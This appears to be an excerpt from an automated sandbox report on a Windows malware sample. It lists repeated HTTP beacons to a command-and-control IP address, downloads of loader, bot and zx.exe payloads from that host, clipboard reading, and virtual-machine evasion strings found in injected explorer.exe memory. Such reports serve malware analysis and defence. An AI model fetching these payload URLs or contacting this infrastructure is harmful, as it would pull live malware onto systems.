Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic	HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4

Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.140

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe

Code function: 0_2_00007FF6E170327C InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

Contains functionality for read data from the clipboard

Source: global traffic	HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic	HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3

Source: unknown

HTTP traffic detected: POST /GrXRYWt.php?8711E746C94A2518020777 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3

Source: explorer.exe	String found in binary or memory: http://176.111.174.140/api/bot.bin
Source: explorer.exe, 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2978916132.000000000B4D0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot.binchrome.exehttp://176.111.174.140/api/bot.bintrusteerchrome.exeoper
Source: explorer.exe, explorer.exe, 00000002.00000002.2981928072.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot64.bin
Source: explorer.exe, 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2978916132.000000000B4D0000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/bot64.binhttp://176.111.174.140/api/bot64.binCreateProcessInternalWKernel
Source: fNzx1wx8tL.exe, 00000000.00000002.1711392974.0000015FFE2BF000.00000004.00000020.00020000.00000000.sdmp, fNzx1wx8tL.exe, 00000000.00000003.1709851725.0000015FFE2BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.111.174.140/api/l
Source: svchost.exe	String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: fNzx1wx8tL.exe	String found in binary or memory: http://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeC
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000002.00000000.1738931822.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1740843885.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2973724478.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: A91B.tmp.zx.exe, 00000008.00000003.1899054230.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micH
